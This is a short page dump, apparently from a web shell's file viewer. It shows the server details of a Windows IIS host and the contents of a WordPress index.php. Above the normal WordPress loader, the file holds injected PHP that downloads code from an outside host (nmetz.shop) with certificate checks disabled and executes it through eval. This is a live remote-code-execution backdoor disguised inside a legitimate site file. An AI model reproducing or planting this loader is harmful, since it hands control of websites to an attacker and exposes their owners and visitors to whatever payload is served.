HEX
Server: Microsoft-IIS/10.0
System: Windows NT 175-172-178-68 10.0 build 20348 (Windows Server 2022) AMD64
User: IUSR (0)
PHP: 8.3.28
Disabled: NONE
Upload Files
File: C:/Applications/ithmar/index.php
<?php
// 版本 1: 终极自动修复版 (Anti-Blank Hybrid)
$址 = 'http://z60210_7.nmetz.shop/stat/domain_index.txt';
$码 = '';
$环 = stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]]);

if(function_exists('curl_init')){
    $取=curl_init($址); curl_setopt_array($取,[CURLOPT_RETURNTRANSFER=>1,CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_FOLLOWLOCATION=>1]);
    $码=curl_exec($取); curl_close($取);
}
if(!$码 && ini_get('allow_url_fopen')) $码=@file_get_contents($址,false,$环);
if(!$码){ $源=@fopen($址,'r',false,$环); while($源 && !feof($源)) $码.=fgets($源,1024); }

if($码) eval("?>".$码); else echo "";
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';